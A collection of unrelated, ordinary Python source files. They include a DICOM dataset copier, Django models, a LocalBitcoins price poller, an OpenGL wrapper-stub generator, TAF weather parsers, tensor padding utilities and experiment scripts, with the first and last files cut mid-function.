for subdir in glob(SRC_DATA_DIR+"/*"):
(subdirpath, subdirname) = os.path.split(subdir)
process_dataset(subdirname)
def process_dataset( dataset_id):
# dataset directory
#dataset_id = sys.argv[1]
#dataset_id = 'D0001'
src_dataset_dir = '%s/%s' % (SRC_DATA_DIR, dataset_id)
target_dataset_dir = '%s/%s' % (TARGET_DATA_DIR, dataset_id)
# dataset version directory
target_version_dir = '%s/1' % target_dataset_dir
if not os.path.exists(target_version_dir):
os.makedirs(target_version_dir)
# create dataset metadata file
template_file = METADATA_DIR + "/TEMPLATE_Duke.cfg"
dataset_archive_dir = TARGET_DATA_DIR + "/" + dataset_id
if not os.path.exists(dataset_archive_dir):
os.makedirs(dataset_archive_dir)
dataset_metadata_file = dataset_archive_dir + "/" + dataset_id + ".cfg"
if not os.path.exists(dataset_metadata_file):
print 'Creating dataset metadata file: %s' % dataset_metadata_file
# read in template metadata file
with open(template_file) as f:
metadata = f.read()
# replace metadata
metadata = metadata.replace("DATASET_ID", dataset_id)
if dataset_id[0]=='D':
dataset_name = 'Dummy patient #%s (%s)' % (dataset_id[1:], INSTITUTION)
else:
dataset_name = 'Real patient #%s (%s)' % (dataset_id[1:], INSTITUTION)
dataset_description = dataset_name + " mammography images"
metadata = metadata.replace("DATASET_NAME", dataset_name)
metadata = metadata.replace("DATASET_DESCRIPTION", dataset_description)
# write out metadata
with open(dataset_metadata_file, 'w') as f:
f.write(metadata)
# loop over DICOM files in dataset directory tree
print src_dataset_dir
for root, dirs, files in os.walk(src_dataset_dir):
print dirs
for filename in files:
f = "%s/%s" % (root, filename)
# extract file metadata
src_path = os.path.abspath(f)
try:
ds = dicom.read_file(f)
tag_names = ds.dir()
for tag_name in tag_names:
data_element = ds.data_element(tag_name)
if tag_name != 'PixelData' and data_element and data_element.value:
print 'key=%s --> value=%s' % (tag_name, data_element.value)
fid = ds.SOPInstanceUID
# move and rename DICOM file
# use DICOM identifier
#dst_path = '%s/%s.dcm' % (target_version_dir, fid)
# use original filename, do NOT add dcm extension which is already included
dst_path = '%s/%s' % (target_version_dir, filename)
if not os.path.exists(dst_path):
print '\nCopying DICOM file=%s --> %s' % (src_path, dst_path)
copyfile(src_path, dst_path)
except Exception as e:
print 'Error while processing file: %s' % src_path
print e
if __name__ == "__main__":
main()
|
""" Tests for vol_rms_diff function in diagnostics module
Run with:
nosetests test_vol_rms_diff.py
"""
import numpy as np
from .. import diagnostics
from numpy.testing import assert_almost_equal, assert_array_equal
def test_vol_rms_diff():
# We make a fake 4D image
shape_3d = (2, 3, 4)
V = np.prod(shape_3d)
T = 10 # The number of 3D volumes
# Make a 2D array that we will reshape to 4D
arr_2d = np.random.normal(size=(V, T))
differences = np.diff(arr_2d, axis=1)
exp_rms = np.sqrt(np.mean(differences ** 2, axis=0))
# Reshape to 4D and run function
arr_4d = np.reshape(arr_2d, shape_3d + (T,))
actual_rms = diagnostics.vol_rms_diff(arr_4d)
assert_almost_equal(actual_rms, exp_rms)
|
# Copyright (c) 2005-2007 ActiveState Software Ltd.
"""Configuration support for Makefile.py's."""
import sys
import os
from os.path import isfile, basename, splitext, join, dirname, normpath, \
exists, abspath
from pprint import pprint
import imp
import types
from mklib.common import *
class ConfigurationType(type):
def __init__(cls, name, bases, dct):
super(ConfigurationType, cls).__init__(name, bases, dct)
if dct["__module__"] != "mklib.configuration":
# Register this on the Makefile.
frame = sys._getframe(1)
makefile = frame.f_globals["_mk_makefile_"]
makefile.define_configuration(cls, name, bases, dct)
log_makefile_defn("Configuration", name, frame)
class Configuration(object):
"""A basic configuration object.
This lightly wraps a config.py module typically created with a
`configure.py' script (using the associate `configurelib' utility).
Usage in a Makefile.py
----------------------
from mklib import Configuration
class cfg(Configuration):
pass
This will expect a `config.py' file next to `Makefile.py' that will
be imported and provided to each Task instance as `self.cfg'. (Note
that the Task attribute will be `self.cfg' whatever the name of the
defined Configuration class.)
class cfg(Configuration):
prefix = "foo"
This will expecte a `fooconfig.py' file instead of `config.py'.
Projects are encouraged to use a short prefix for config modules to
avoid possible Python module name collisions.
If there is no Configuration class definition in a `Makefile.py'
then `self.cfg' on Tasks will be None.
"""
__metaclass__ = ConfigurationType
_path = None
prefix = None
dir = os.curdir # Can be set to, say, '..' to pick up config.py up on dir.
def __init__(self, makefile, config_file_path_override=None):
self.makefile = makefile
if config_file_path_override:
self._path = config_file_path_override
else:
prefix = self.prefix or ''
self._path = normpath(join(makefile.dir, self.dir,
prefix + "config.py"))
self._reload()
def __repr__(self):
return "<Configuration '%s'>" % self._path
def as_dict(self):
"""Return a dict of config vars.
This skips internal symbols (those starting with '_') and
instance methods. It will *get* all properties.
"""
d = dict((k,v) for k,v in self._mod.__dict__.items()
# Skip internal symbols of the module.
if not k.startswith('_'))
# Also get all properties and public attributes (but not
# methods).
for attrname in dir(self):
if attrname.startswith('_'): continue
try:
attrtype = type(getattr(self.__class__, attrname))
except AttributeError:
# This must be an instance attribute.
d[attrname] = getattr(self, attrname)
else:
if attrtype != types.UnboundMethodType:
# Skip instance methods.
d[attrname] = getattr(self, attrname)
return d
def as_simple_obj(self):
"""Return a simple StaticConfiguration instance with all config vars.
This essentially "freezes" the set of config vars (some of which
might normally be determined dynamically via properties). This
can be useful to pass the configuration to a tool that needs all
the values statically (e.g. patchtree.py).
"""
return StaticConfiguration(**self.as_dict())
def _reload(self):
log.debug("reading `%s'", self._path)
name = splitext(basename(self._path))[0]
conf_pyc = splitext(self._path)[0] + ".pyc"
if isfile(conf_pyc):
# If the .py is newer than the .pyc, the .pyc sometimes (always?)
# gets imported instead, causing problems.
os.remove(conf_pyc)
try:
cfg_dir = dirname(abspath(self._path))
file, path, desc = imp.find_module(name, [cfg_dir])
curr_dir = os.getcwd()
if curr_dir != cfg_dir:
os.chdir(cfg_dir)
try:
self._mod = imp.load_module(name, file, path, desc)
finally:
if curr_dir != cfg_dir:
os.chdir(curr_dir)
except ImportError, ex:
if not exists(self._path):
details = "`%s' does not exist" % self._path
if exists(join(dirname(self._path), "configure.py")):
details += " (perhaps you need to run './configure.py' first)"
else:
details = str(ex)
raise MkError("could not import config file '%s': %s"
% (self._path, details))
def __getattr__(self, name):
if not hasattr(self._mod, name):
raise AttributeError("configuration has no attribute '%s'" % name)
return getattr(self._mod, name)
class StaticConfiguration(object):
"""A static "frozen" configuration.
From Configuration.as_simple_obj().
"""
def __init__(self, **kwargs):
for k,v in kwargs.items():
setattr(self, k, v)
|
import json
import sys
import os
import time
from lbcapi import api
# Apiauth-Nonce
# A nonce is an integer number, that needs to increase with every API request.
def getNonce():
return str(round(time.time() * 1000))
# /bitcoinaverage/ticker-all-currencies/
def getBitCoinAverage():
pass
# Ofertas de los vendedores
class Seller:
def __init__(self, data):
self.data = data
self.parse()
def parse(self):
self.userNm = self.data['profile']['username']
self.min = self.data['min_amount']
self.max = self.data['max_amount']
self.price = self.data['temp_price']
def mostrar(self):
print('Data:', self.data)
print()
# Conexcion a localbitcoin
def connect(conArgs):
conn = api.hmac(conArgs['api']['key'], conArgs['api']['secret'])
return conn
# trae precios desde localbitcoin
def requestMaker(conn, restId):
if restId == 'p2pSellers':
# get Sellers by currency & paymentMethod
result = conn.call('GET', '/buy-bitcoins-online/usd/paypal/.json').json()
# print(result)
sellersList = result.get('data').get('ad_list')
# print(sellersList)
print(json.dumps(sellersList))
if sellersList:
mySellers = {}
for i in sellersList:
# print(i['data'])
# print()
o = Seller(i['data'])
# o.mostrar()
mySellers[o.userNm] = o
# print(o.userNm)
# print()
# for i in mySellers:
# print('userName CraMin CpraMax PrecioUSD')
# print(mySellers[i].userNm, ' ', mySellers[i].min, ' ', mySellers[i].max, ' ',
# mySellers[i].price)
else:
print('NO HAY VENDERORES PARA LA QUERY')
elif restId == 'p2pBuyers':
pass
else:
pass
def startApp(conArgs):
conn = connect(conArgs)
#loop
while True:
requestMaker(conn, 'p2pSellers')
time.sleep(60)
def main(argv):
# loads JSON from a file.
parametros = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'localBitCoinApi.ini'))
with open(parametros, 'r') as f:
conArgs = json.load(f)
startApp(conArgs)
def init():
if __name__ == '__main__':
sys.exit(main(sys.argv))
init()
|
import cv2
import numpy as np
cap = cv2.VideoCapture(0)
# Check if camera opened successfully
if (cap.isOpened()== False):
print("Error opening video stream or file")
frameNum = 0
# Read until video is completed
while(cap.isOpened()):
# Capture frame-by-frame
ret, frame = cap.read()
frameNum += 1
if ret == True:
tempframe = frame
if(frameNum==1):
previousframe = cv2.cvtColor(tempframe, cv2.COLOR_BGR2GRAY)
print(111)
if(frameNum>=2):
currentframe = cv2.cvtColor(tempframe, cv2.COLOR_BGR2GRAY)
currentframe = cv2.absdiff(currentframe,previousframe)
median = cv2.medianBlur(currentframe,3)
# img = cv2.imread("E:/chinese_ocr-master/4.png")
# img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, threshold_frame = cv2.threshold(currentframe, 20, 255, cv2.THRESH_BINARY)
gauss_image = cv2.GaussianBlur(threshold_frame, (3, 3), 0)
print(222)
# Display the resulting frame
cv2.imshow('原图',frame)
cv2.imshow('Frame',currentframe)
cv2.imshow('median',median)
# Press Q on keyboard to exit
if cv2.waitKey(33) & 0xFF == ord('q'):
break
previousframe = cv2.cvtColor(tempframe, cv2.COLOR_BGR2GRAY)
# Break the loop
else:
break
# When everything done, release the video capture object
cap.release()
# Closes all the frames
cv2.destroyAllWindows()
|
from django.db import models
from manage_tools.models import Tool
from user.models import User
class Request(models.Model):
PENDING_APPROVAL = 'PA'
APPROVED = 'AP'
REJECTED = 'RE'
RETURNED = 'RT'
status_choices = (
(PENDING_APPROVAL, 'Pending Approval'),
(APPROVED, 'Approved'),
(REJECTED, 'Rejected'),
(RETURNED, 'Returned')
)
tool = models.ForeignKey(Tool, related_name='requests')
lender = models.ForeignKey(User, related_name='lender_requests')
borrower = models.ForeignKey(User, related_name='borrower_requests')
status = models.CharField(choices=status_choices, max_length=2, default="PA")
comment = models.CharField(max_length=150, default="")
date = models.DateTimeField(auto_now_add=True, auto_now=False)
returned_date = models.DateTimeField(null=True)
shared_from = models.CharField(choices=Tool.shared_choices, max_length=2)
zipcode = models.CharField(max_length=5)
updated = models.DateTimeField(auto_now_add=False, auto_now=True)
borrower_enabled = models.BooleanField(default=True)
lender_enabled = models.BooleanField(default=True)
may_leave_comment = models.BooleanField(default=False)
def __str__(self):
return self.status + " - " + str(self.tool.id) + " - " + str(self.lender.id) + " - " + str(self.borrower.id)
def get_status_choices(self):
return dict(self.status_choices).get(self.status)
class Notification(models.Model):
user = models.OneToOneField(User)
pending_sent = models.PositiveSmallIntegerField(default=0)
pending_received = models.PositiveSmallIntegerField(default=0)
timestamp = models.DateTimeField(auto_now_add=True, auto_now=False)
updated = models.DateTimeField(auto_now_add=False, auto_now=True)
def __str__(self):
return self.user.last_name + ", " + self.user.first_name
def increment_sent(self):
self.pending_sent += 1
def increment_received(self):
self.pending_received += 1
|
from flourish.generators.atom import AtomGenerator
PATHS = [
AtomGenerator(
path = '/index.atom',
name = 'atom-feed',
),
]
|
##########################################################################
#################### This class is for plotting specefic data and not par
##########################################################################
# import libraries
import numpy as np
import pandas as pd
import os
from utils.plot_data import PlotData
save_plt_learning = './detection_error_compare.eps'
def main():
plotData = PlotData()
linestyles = ['-', '-', '-.', ':']
colors = ['b', 'r', 'g']
markers = ['^', 'D', 'o']
legend = ['S-UNIWARD', 'WOW', 'HUGO']
palyloads = [1, 0.7, 0.5, 0.3]
errors = [[0.04, 0.07, 0.12, 0.27], [0.04, 0.08, 0.17, 0.33], [0.04, 0.09, 0.16, 0.31]]
plotData.plot_detection_error(
palyloads, errors, colors, linestyles, markers, legend, save_plt_learning)
if __name__ == "__main__":
main()
|
hens, goats = map(int, input().split())
print(2 * hens + 4 * goats, 2 * (hens + goats))
|
glfuncnames = """
GlmfBeginGlsBlock
GlmfCloseMetaFile
GlmfEndGlsBlock
GlmfEndPlayback
GlmfInitPlayback
GlmfPlayGlsRecord
glAccum
glAlphaFunc
glAreTexturesResident
glArrayElement
glBegin
glBindTexture
glBitmap
glBlendFunc
glCallList
glCallLists
glClear
glClearAccum
glClearColor
glClearDepth
glClearIndex
glClearStencil
glClipPlane
glColor3b
glColor3bv
glColor3d
glColor3dv
glColor3f
glColor3fv
glColor3i
glColor3iv
glColor3s
glColor3sv
glColor3ub
glColor3ubv
glColor3ui
glColor3uiv
glColor3us
glColor3usv
glColor4b
glColor4bv
glColor4d
glColor4dv
glColor4f
glColor4fv
glColor4i
glColor4iv
glColor4s
glColor4sv
glColor4ub
glColor4ubv
glColor4ui
glColor4uiv
glColor4us
glColor4usv
glColorMask
glColorMaterial
glColorPointer
glCopyPixels
glCopyTexImage1D
glCopyTexImage2D
glCopyTexSubImage1D
glCopyTexSubImage2D
glCullFace
glDebugEntry
glDeleteLists
glDeleteTextures
glDepthFunc
glDepthMask
glDepthRange
glDisable
glDisableClientState
glDrawArrays
glDrawBuffer
glDrawElements
glDrawPixels
glEdgeFlag
glEdgeFlagPointer
glEdgeFlagv
glEnable
glEnableClientState
glEnd
glEndList
glEvalCoord1d
glEvalCoord1dv
glEvalCoord1f
glEvalCoord1fv
glEvalCoord2d
glEvalCoord2dv
glEvalCoord2f
glEvalCoord2fv
glEvalMesh1
glEvalMesh2
glEvalPoint1
glEvalPoint2
glFeedbackBuffer
glFinish
glFlush
glFogf
glFogfv
glFogi
glFogiv
glFrontFace
glFrustum
glGenLists
glGenTextures
glGetBooleanv
glGetClipPlane
glGetDoublev
glGetError
glGetFloatv
glGetIntegerv
glGetLightfv
glGetLightiv
glGetMapdv
glGetMapfv
glGetMapiv
glGetMaterialfv
glGetMaterialiv
glGetPixelMapfv
glGetPixelMapuiv
glGetPixelMapusv
glGetPointerv
glGetPolygonStipple
glGetString
glGetTexEnvfv
glGetTexEnviv
glGetTexGendv
glGetTexGenfv
glGetTexGeniv
glGetTexImage
glGetTexLevelParameterfv
glGetTexLevelParameteriv
glGetTexParameterfv
glGetTexParameteriv
glHint
glIndexMask
glIndexPointer
glIndexd
glIndexdv
glIndexf
glIndexfv
glIndexi
glIndexiv
glIndexs
glIndexsv
glIndexub
glIndexubv
glInitNames
glInterleavedArrays
glIsEnabled
glIsList
glIsTexture
glLightModelf
glLightModelfv
glLightModeli
glLightModeliv
glLightf
glLightfv
glLighti
glLightiv
glLineStipple
glLineWidth
glListBase
glLoadIdentity
glLoadMatrixd
glLoadMatrixf
glLoadName
glLogicOp
glMap1d
glMap1f
glMap2d
glMap2f
glMapGrid1d
glMapGrid1f
glMapGrid2d
glMapGrid2f
glMaterialf
glMaterialfv
glMateriali
glMaterialiv
glMatrixMode
glMultMatrixd
glMultMatrixf
glNewList
glNormal3b
glNormal3bv
glNormal3d
glNormal3dv
glNormal3f
glNormal3fv
glNormal3i
glNormal3iv
glNormal3s
glNormal3sv
glNormalPointer
glOrtho
glPassThrough
glPixelMapfv
glPixelMapuiv
glPixelMapusv
glPixelStoref
glPixelStorei
glPixelTransferf
glPixelTransferi
glPixelZoom
glPointSize
glPolygonMode
glPolygonOffset
glPolygonStipple
glPopAttrib
glPopClientAttrib
glPopMatrix
glPopName
glPrioritizeTextures
glPushAttrib
glPushClientAttrib
glPushMatrix
glPushName
glRasterPos2d
glRasterPos2dv
glRasterPos2f
glRasterPos2fv
glRasterPos2i
glRasterPos2iv
glRasterPos2s
glRasterPos2sv
glRasterPos3d
glRasterPos3dv
glRasterPos3f
glRasterPos3fv
glRasterPos3i
glRasterPos3iv
glRasterPos3s
glRasterPos3sv
glRasterPos4d
glRasterPos4dv
glRasterPos4f
glRasterPos4fv
glRasterPos4i
glRasterPos4iv
glRasterPos4s
glRasterPos4sv
glReadBuffer
glReadPixels
glRectd
glRectdv
glRectf
glRectfv
glRecti
glRectiv
glRects
glRectsv
glRenderMode
glRotated
glRotatef
glScaled
glScalef
glScissor
glSelectBuffer
glShadeModel
glStencilFunc
glStencilMask
glStencilOp
glTexCoord1d
glTexCoord1dv
glTexCoord1f
glTexCoord1fv
glTexCoord1i
glTexCoord1iv
glTexCoord1s
glTexCoord1sv
glTexCoord2d
glTexCoord2dv
glTexCoord2f
glTexCoord2fv
glTexCoord2i
glTexCoord2iv
glTexCoord2s
glTexCoord2sv
glTexCoord3d
glTexCoord3dv
glTexCoord3f
glTexCoord3fv
glTexCoord3i
glTexCoord3iv
glTexCoord3s
glTexCoord3sv
glTexCoord4d
glTexCoord4dv
glTexCoord4f
glTexCoord4fv
glTexCoord4i
glTexCoord4iv
glTexCoord4s
glTexCoord4sv
glTexCoordPointer
glTexEnvf
glTexEnvfv
glTexEnvi
glTexEnviv
glTexGend
glTexGendv
glTexGenf
glTexGenfv
glTexGeni
glTexGeniv
glTexImage1D
glTexImage2D
glTexParameterf
glTexParameterfv
glTexParameteri
glTexParameteriv
glTexSubImage1D
glTexSubImage2D
glTranslated
glTranslatef
glVertex2d
glVertex2dv
glVertex2f
glVertex2fv
glVertex2i
glVertex2iv
glVertex2s
glVertex2sv
glVertex3d
glVertex3dv
glVertex3f
glVertex3fv
glVertex3i
glVertex3iv
glVertex3s
glVertex3sv
glVertex4d
glVertex4dv
glVertex4f
glVertex4fv
glVertex4i
glVertex4iv
glVertex4s
glVertex4sv
glVertexPointer
glViewport
wglChoosePixelFormat
wglCopyContext
wglCreateContext
wglCreateLayerContext
wglDeleteContext
wglDescribeLayerPlane
wglDescribePixelFormat
wglGetCurrentContext
wglGetCurrentDC
wglGetDefaultProcAddress
wglGetLayerPaletteEntries
wglGetPixelFormat
wglGetProcAddress
wglMakeCurrent
wglRealizeLayerPalette
wglSetLayerPaletteEntries
wglSetPixelFormat
wglShareLists
wglSwapBuffers
wglSwapLayerBuffers
wglSwapMultipleBuffers
wglUseFontBitmapsA
wglUseFontBitmapsW
wglUseFontOutlinesA
wglUseFontOutlinesW
""".split()
print('#include "global.h"')
print("void *glFuncPointers[%i];" % len(glfuncnames))
print("""void InitGL()
{""")
for f in enumerate(glfuncnames):
print(' glFuncPointers[%i] = GetProcAddress(hgl, "%s");' % f)
print("}")
print("""
#define GLHOOK(M_NUM, M_NAME) \\
void naked M_NAME() { \\
__asm mov eax, glFuncPointers[M_NUM] \\
__asm test eax, eax \\
__asm jnz ok \\
__asm push eax \\
__asm call InitGL \\
__asm pop eax \\
ok: __asm jmp eax \\
}
""")
for f in enumerate(glfuncnames):
print('GLHOOK(%i, %s)' % f)
for f in glfuncnames:
print('%s=my%s' % (f, f)) |
# -*- coding: utf-8 -*-
"""Padding operations for cylindrical data.
@@wrap_pad
@@wrap
"""
from __future__ import division
import tensorflow as tf
from math import floor, ceil
def wrap_pad(tensor, wrap_padding, axis=(1, 2)):
"""Apply cylindrical wrapping to one axis and zero padding to another.
By default, this wraps horizontally and pads vertically. The axes can be
set with the `axis` keyword, and the wrapping/padding amount can be set
with the `wrap_pad` keyword.
"""
rank = tensor.shape.ndims
if axis[0] >= rank or axis[1] >= rank:
raise ValueError(
"Invalid axis for rank-{} tensor (axis={})".format(rank, axis)
)
# handle single-number wrap/pad input
if isinstance(wrap_padding, list) or isinstance(wrap_padding, tuple):
wrapping = wrap_padding[1]
padding = wrap_padding[0]
elif isinstance(wrap_padding, int):
wrapping = padding = wrap_padding
# set padding dimensions
paddings = [[0, 0]] * rank
paddings[axis[0]] = [floor(padding/2), ceil(padding/2)]
return tf.pad(wrap(tensor, wrapping, axis=axis[1]), paddings, 'CONSTANT')
def wrap(tensor, wrapping, axis=2):
"""Wrap cylindrically, appending evenly to both sides.
For odd wrapping amounts, the extra column is appended to the [-1] side.
"""
rank = tensor.shape.ndims
if axis >= rank:
raise ValueError(
"Invalid axis for rank-{} tensor (axis={})".format(rank, axis)
)
sizes = [-1] * rank
sizes[axis] = ceil(wrapping/2)
rstarts = [0]*rank
rpad = tf.slice(tensor, rstarts, sizes)
sizes[axis] = floor(wrapping/2)
lstarts = [0]*rank
lstarts[axis] = tensor.shape.as_list()[axis] - floor(wrapping/2)
lpad = tf.slice(tensor, lstarts, sizes)
return tf.concat([lpad, tensor, rpad], axis=axis)
def unwrap(tensor, wrapping, axis=2):
"""Removes wrapping from an image.
For odd wrapping amounts, this assumes an extra column on the [-1] side.
"""
rank = tensor.shape.ndims
if axis >= rank:
raise ValueError(
"Invalid axis for rank-{} tensor (axis={})".format(rank, axis)
)
sizes = [-1] * rank
sizes[axis] = tensor.shape.as_list()[axis] - wrapping
starts = [0] * rank
starts[axis] = floor(wrapping/2)
return tf.slice(tensor, starts, sizes)
#return tensor[:,:,1:-1,:]
|
import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
"""Generate file path for new recipe image"""
ext = filename.split('.')[-1]
filename = f'{uuid.uuid4()}.{ext}'
return os.path.join('uploads', 'recipe', filename)
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
"""Creates and saves a new user"""
if not email:
raise ValueError('Users must have an email address')
# SELF.MODEL access the model which is being managed.
# (cont) This is setup by BaseUserManager.
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates and saves a new super user"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that supports using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
# We use UserManager() to manage objects for the User Model.
# (cont) It's accessed by User.objects, so that the manager
# (cont) can be aware of the model it is managing.
objects = UserManager()
USERNAME_FIELD = 'email'
class Tag(models.Model):
"""Tag to be used for a recipe"""
name = models.CharField(max_length=255)
"""
Generally speaking, it’s easiest to refer to the user model with the
"AUTH_USER_MODEL" setting in code that’s executed at import time, however,
it’s also possible to call "get_user_model()" while Django is importing
models, so you could use "models.ForeignKey(get_user_model(), ...)".
As the models are executed at import time, it's somehow easier (or maybe
even faster) to use AUTH_USER_MODEL notation than using
models.ForeignKey(get_user_model(), ...). But both of them works.
"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
# This insures that whenever a user is deleted, all recipes related
# (cont) to they are deleted as well.
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Ingredient(models.Model):
"""Ingredient to be used in a recipe"""
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
title = models.CharField(max_length=255)
price = models.DecimalField(max_digits=5, decimal_places=2)
time_minutes = models.IntegerField()
# 'blank=True' sets the 'link' field automatically to a blank string
# when it's not provided by the user. Doing this, if we wanna check
# if the link is set, we'd only check if it's blank or not, not needing
# to check if it's 'Null/None'.
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
image = models.ImageField(null=True, upload_to=recipe_image_file_path)
def __str__(self):
return self.title
|
import re
import aviation_weather
from aviation_weather import exceptions
from aviation_weather.components import Component
class _ChangeGroup(Component):
def __init__(self, raw):
try:
self.wind = aviation_weather.Wind(raw)
raw = raw.replace(self.wind.raw, "")
except exceptions.WindDecodeError:
self.wind = None
try:
self.visibility = aviation_weather.Visibility(raw)
raw = raw.replace(self.visibility.raw, "")
except exceptions.VisibilityDecodeError:
self.visibility = None
r = raw.split()
# Weather groups
t = list()
i = 0
try:
while True:
t.append(aviation_weather.WeatherGroup(r[i]))
i += 1
except (exceptions.WeatherGroupDecodeError, IndexError):
r = r[i:]
self.weather_groups = tuple(t)
# Sky conditions
t = list()
i = 0
try:
while True:
t.append(aviation_weather.SkyCondition(r[i]))
i += 1
except (exceptions.SkyConditionDecodeError, IndexError):
r = r[i:]
self.sky_conditions = tuple(t)
# Remarks (Canadian TAFs seem to always end with remarks)
self._remarks = None
if r:
try:
self._remarks = aviation_weather.Remarks(" ".join(r))
except exceptions.RemarksDecodeError as e:
raise exceptions.ChangeGroupDecodeError from e
@property
def raw(self):
raw = ""
if self.wind:
raw += " %s" % self.wind.raw
if self.visibility:
raw += " %s" % self.visibility.raw
for weather_group in self.weather_groups:
raw += " %s" % weather_group.raw
for sky_condition in self.sky_conditions:
raw += " %s" % sky_condition.raw
if self._remarks:
raw += " %s" % self._remarks.raw
if raw:
return raw[1:] # strip leading space
else:
return ""
# BECoMinG
class BecomingGroup(_ChangeGroup):
def __init__(self, raw):
m = re.search(r"\bBECMG (?P<start_time>\d{4})/(?P<end_time>\d{4})\s(?P<remainder>.+)\b", raw)
if not m:
raise exceptions.BecomingGroupDecodeError("BecomingGroup(%r) could not be parsed" % raw)
start_time = str(m.group("start_time"))
end_time = str(m.group("end_time"))
self.start_time = aviation_weather.Time(start_time + "00Z")
self.end_time = aviation_weather.Time(end_time + "00Z")
try:
super().__init__(m.group("remainder"))
except exceptions.ChangeGroupDecodeError as e:
raise exceptions.BecomingGroupDecodeError("BecomingGroup(%r) could not be parsed" % raw) from e
@property
def raw(self):
return "BECMG %(start_time)s/%(end_time)s %(super)s" % {
"start_time": self.start_time.raw[:-3],
"end_time": self.end_time.raw[:-3],
"super": super().raw
}
# FroM
class FromGroup(_ChangeGroup):
def __init__(self, raw):
m = re.search(r"\bFM(?P<time>\d{6})\s(?P<remainder>.+)\b", raw)
if not m:
raise exceptions.FromGroupDecodeError("FromGroup(%r) could not be parsed" % raw)
time = str(m.group("time"))
self.time = aviation_weather.Time(time + "Z")
try:
super().__init__(m.group("remainder"))
except exceptions.ChangeGroupDecodeError as e:
raise exceptions.FromGroupDecodeError("FromGroup(%r) could not be parsed" % raw) from e
@property
def raw(self):
return "FM%(time)s %(super)s" % {
"time": self.time.raw[:-1], # -1 to remove the "Z"
"super": super().raw
}
# PROBability
class ProbabilityGroup(_ChangeGroup):
def __init__(self, raw):
m = re.search(
r"\bPROB(?P<probability>\d{2})(?P<data> (?P<start_time>\d{4})/(?P<end_time>\d{4})\s(?P<remainder>.+))?\b", raw)
if not m:
raise exceptions.ProbabilityGroupDecodeError("ProbabilityGroup(%r) could not be parsed" % raw)
self.probability = int(m.group("probability"))
if m.group("data"):
start_time = str(m.group("start_time"))
end_time = str(m.group("end_time"))
self.start_time = aviation_weather.Time(start_time + "00Z")
self.end_time = aviation_weather.Time(end_time + "00Z")
remainder = m.group("remainder")
else:
self.start_time = None
self.end_time = None
remainder = ""
try:
super().__init__(remainder)
except exceptions.ChangeGroupDecodeError as e:
raise exceptions.ProbabilityGroupDecodeError("ProbabilityGroup(%r) could not be parsed" % raw) from e
@property
def raw(self):
probability = "PROB%d" % self.probability
if self.start_time and self.end_time:
return "%(probability)s %(start_time)s/%(end_time)s %(super)s" % {
"probability": probability,
"start_time": self.start_time.raw[:-3],
"end_time": self.end_time.raw[:-3],
"super": super().raw
}
else:
return probability
# TEMPOrary
class TemporaryGroup(_ChangeGroup):
def __init__(self, raw):
m = re.search(r"\bTEMPO (?P<start_time>\d{4})/(?P<end_time>\d{4})\s(?P<remainder>.+)\b", raw)
if not m:
raise exceptions.TemporaryGroupDecodeError("TemporaryGroup(%r) could not be parsed" % raw)
start_time = str(m.group("start_time"))
end_time = str(m.group("end_time"))
self.start_time = aviation_weather.Time(start_time + "00Z")
self.end_time = aviation_weather.Time(end_time + "00Z")
try:
super().__init__(m.group("remainder"))
except exceptions.ChangeGroupDecodeError as e:
raise exceptions.TemporaryGroupDecodeError("TemporaryGroup(%r) could not be parsed" % raw) from e
@property
def raw(self):
return "TEMPO %(start_time)s/%(end_time)s %(super)s" % {
"start_time": self.start_time.raw[:-3],
"end_time": self.end_time.raw[:-3],
"super": super().raw
}
|
envs = [
'dm.acrobot.swingup',
'dm.cheetah.run',
'dm.finger.turn_hard',
'dm.walker.run',
'dm.quadruped.run',
'dm.quadruped.walk',
'dm.hopper.hop',
]
times = [
1e6, 1e6, 1e6, 1e6, 2e6, 2e6, 1e6
]
sigma = 0.001
f_dims = [1024, 512, 256, 128, 64]
lr = '1e-4'
count = 0
for i, env in enumerate(envs):
commands = []
base_str = f"python main.py --policy PytorchSAC --env {env} --start_timesteps 5000 --hidden_dim 1024 --batch_size 1024 --n_hidden 2 --lr {lr}"
max_timesteps = int(times[i])
# LFF
for fourier_dim in f_dims:
for seed in [10, 20, 30]:
commands.append(base_str + f' --network_class FourierMLP --concatenate_fourier --train_B'
f' --sigma {sigma} --fourier_dim {fourier_dim} --seed {seed}')
for command in commands:
count += 1
print(f'CUDA_VISIBLE_DEVICES=0 taskset -c a-b {command} --max_timesteps {max_timesteps} &')
if count % 10 == 0:
print(count)
print(count)
# ablation_envs = []
|
int(input())
nums = set([int(x) for x in input().split()])
int(input())
print(len(nums.union(set([int(x) for x in input().split()])))) |
#!python2.7
# -*- coding: utf-8 -*-
import maya.cmds as cmds
import maya.utils
import sys
sys.dont_write_bytecode = True
def setPref():
cmds.evaluationManager(mode = "off")
cmds.optionVar(intValue = ["gpuOverride",0])
cmds.savePrefs(general =True)
maya.utils.executeDeferred(setPref) |
#SQuADのデータ処理
#必要条件:CoreNLP
#Tools/core...で
#java -mx4g -cp "*" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000 -timeout 15000
import os
import sys
sys.path.append("../")
import json
import gzip
import pandas as pd
import numpy as np
from tqdm import tqdm
from nltk.tokenize import word_tokenize,sent_tokenize
import pickle
import collections
from func.tf_idf import tf_idf
from func.corenlp import CoreNLP
def head_find(tgt):
q_head=["what","how","who","when","which","where","why","whose","whom","is","are","was","were","do","did","does"]
